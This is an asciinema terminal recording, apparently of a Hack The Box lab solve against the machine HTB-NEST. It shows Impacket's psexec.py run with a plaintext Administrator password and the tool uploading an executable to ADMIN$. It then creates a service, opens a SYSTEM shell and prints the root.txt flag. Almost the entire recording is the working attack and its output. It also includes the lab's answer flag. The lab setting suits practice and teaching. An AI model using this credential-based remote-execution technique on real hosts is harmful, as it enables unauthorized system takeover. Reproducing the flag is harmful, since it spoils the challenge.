{"version": 2, "width": 155, "height": 42, "timestamp": 1591379361, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.037138, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                          \r \r\u001bk/home/prashant\u001b\\"]
[0.040111, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[0.040233, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.406436, "o", "asciinema rec"]
[0.521122, "o", "\u001b[13Dpython3 /usr/share/doc/python3-impacket/examples/psexec.py Administrator:XtH4nkS4Pl4y1nGX@10.10.10.178"]
[0.691743, "o", "\u001b[?1l\u001b>"]
[0.691939, "o", "\u001b[?2004l\r\r\n"]
[0.692139, "o", "\u001bkpython3\u001b\\"]
[0.830408, "o", "Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation\r\n\r\n"]
[3.381095, "o", "[*] Requesting shares on 10.10.10.178.....\r\n"]
[6.248344, "o", "[*] Found writable share ADMIN$\r\n"]
[6.537345, "o", "[*] Uploading file YMlwQJku.exe\r\n"]
[9.710069, "o", "[*] Opening SVCManager on 10.10.10.178.....\r\n"]
[11.719658, "o", "[*] Creating service FTBO on 10.10.10.178.....\r\n"]
[13.442024, "o", "[*] Starting service FTBO.....\r\n"]
[18.382676, "o", "[!] Press help for extra shell commands\r\n\b"]
[20.946804, "o", "Microsoft Windows [Version 6.1.7601]"]
[21.229028, "o", "\r\r\n"]
[21.513483, "o", "Copyright (c) 2009 Microsoft Corporation.  All rights reserved."]
[22.088849, "o", "\r\r\n"]
[22.382231, "o", "\r\r\n"]
[22.670094, "o", "C:\\Windows\\system32>"]
[23.28836, "o", "w"]
[23.497123, "o", "h"]
[23.742246, "o", "o"]
[23.900895, "o", "a"]
[24.022703, "o", "m"]
[24.231581, "o", "i"]
[24.441, "o", "\r\n"]
[24.967128, "o", "\b"]
[25.39912, "o", "nt authority\\system"]
[25.683346, "o", "\r\r\n"]
[26.121627, "o", "\r\r\n"]
[26.197497, "o", "h"]
[26.552936, "o", "C:\\Windows\\system32>"]
[26.571865, "o", "o"]
[27.608799, "o", "\b \b"]
[28.451387, "o", "\b \b"]
[29.077942, "o", "h"]
[29.286552, "o", "o"]
[29.517029, "o", "s"]
[29.675418, "o", "t"]
[30.035626, "o", "n"]
[30.150768, "o", "a"]
[30.222682, "o", "m"]
[30.395509, "o", "e"]
[30.561141, "o", "\r\n"]
[30.872618, "o", "\b"]
[31.177471, "o", "HTB-NEST\r\r\n"]
[31.461252, "o", "\r\r\n"]
[31.744761, "o", "C:\\Windows\\system32>"]
[33.15293, "o", "type \\Users\\Administrator\\Desktop\\root.txt"]
[33.347981, "o", "\r\n"]
[33.89886, "o", "\b"]
[34.185593, "o", "6594c2eb084bc0f08a42f0b94b878c41"]
[34.480266, "o", "\r\r\n"]
[34.774225, "o", "C:\\Windows\\system32>"]
[36.263607, "o", "^Z"]
[36.263922, "o", "\r\n[1]  + 3845 suspended  python3 /usr/share/doc/python3-impacket/examples/psexec.py \r\n\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                          \r \r\u001bk/home/prashant\u001b\\"]
[36.266837, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[36.266964, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[36.580606, "o", "\u001b[?2004l\r\r\n"]
[36.580742, "o", "zsh: you have suspended jobs.\r\n"]
[36.580811, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                          \r \r"]
[36.580928, "o", "\u001bk/home/prashant\u001b\\"]
[36.58378, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[36.583822, "o", "\u001b[?1h\u001b="]
[36.583963, "o", "\u001b[?2004h"]
[37.120677, "o", "\u001b[?2004l\r\r\n"]
